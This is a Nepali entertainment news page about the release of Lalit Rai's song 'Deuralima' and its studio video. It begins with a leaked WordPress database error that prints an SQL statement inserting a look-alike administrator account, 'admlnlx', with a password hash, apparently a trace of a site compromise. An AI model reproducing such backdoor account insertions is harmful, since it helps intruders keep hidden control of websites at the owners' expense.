WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRYObIaDwuam4p9q/YovxuyTSDgi83/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 13:54:20', '', 'admlnlx', 'admlnlx')
काठमाण्डौं । युवा गायक ललित राईको स्वरमा रहेको “देउरालीमा” बोलको गीत सार्वजनिक भएको छ ।
टिका चाम्लिङको शब्द, जसिहाङ राईको संगीत, राजु कार्कीको संगीत संयोजन रहेको गीतको स्टुडियो भिडियो आज सार्वजनिक भएको हो ।
मुना राई, रोशना राई र शुस्मा राईले गायक ललित राईलाई कोरसमा साथ दिएका छन ।
याम मामा सेकुवाघर, खुमलटारले निर्माण गरेको स्टुडियो भिडियो गाउँले इन्टरटेनमेन्ट युटुब च्यानलबाट सार्वजनिक गरिएको छ ।
उक्त स्टुडियो भिडियोमा छयाङ्कन र सम्पादन गंगाराम राईले गरेका छन् ।